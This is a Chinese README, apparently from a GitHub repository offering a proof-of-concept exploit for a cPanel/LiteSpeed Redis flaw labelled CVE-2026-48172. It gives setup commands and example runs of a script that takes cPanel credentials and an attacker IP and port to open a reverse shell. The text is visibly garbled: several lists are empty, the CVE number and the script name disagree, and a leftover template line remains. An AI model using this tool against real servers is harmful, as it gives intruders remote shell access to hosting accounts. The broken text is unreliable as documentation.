一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
请仅在安全且已授权的环境中使用本项目,例如:
示例配置:
git clone https://github.com/HORKimhab/CVE-2026-48172 && cd CVE-2026-48172
cd lab
docker compose up --build -d
cd ..
示例用法:
# 用于本地主机(自动使用 HTTP)
python3 cve-2026-48712.py -u test -p test -H localhost:2083 -i 192.168.1.100
# 用于远程服务器(使用 HTTPS)
python3 cve-2026-48712.py -u test -p test -H example.com:2083 -i 192.168.1.100
usage: cve-2026-48712.py [-h] -u USER -p PASSWORD [-H HOST] -i ATTACKER_IP [-P ATTACKER_PORT]
CVE-2026-48172 PoC - LiteSpeed cPanel Redis TLS 反向 Shell
options:
-h, --help show this help message and exit
-u, --user USER cPanel username
-p, --password PASSWORD
cPanel password
-H, --host HOST cPanel host with protocol and port (default: http://localhost:2083)
-i, --attacker-ip ATTACKER_IP
Your IP for reverse shell
-P, --attacker-port ATTACKER_PORT
Reverse shell port (default: 8443)
请将上述命令替换为你实际的项目配置步骤。
本仓库仅用于教育和已授权的安全研究。
它旨在帮助用户了解:
请仅在您拥有权限的环境中使用本仓库,例如:
严禁未经授权或非法使用。
作者和贡献者不对本项目造成的任何损害、误用、法律问题或损失负责。
使用本仓库即表示您同意:
本项目旨在用于:
请遵循负责任的披露实践,并遵守所有适用法律。
如需进行负责任的披露或合作,请通过 GitHub 联系仓库维护者。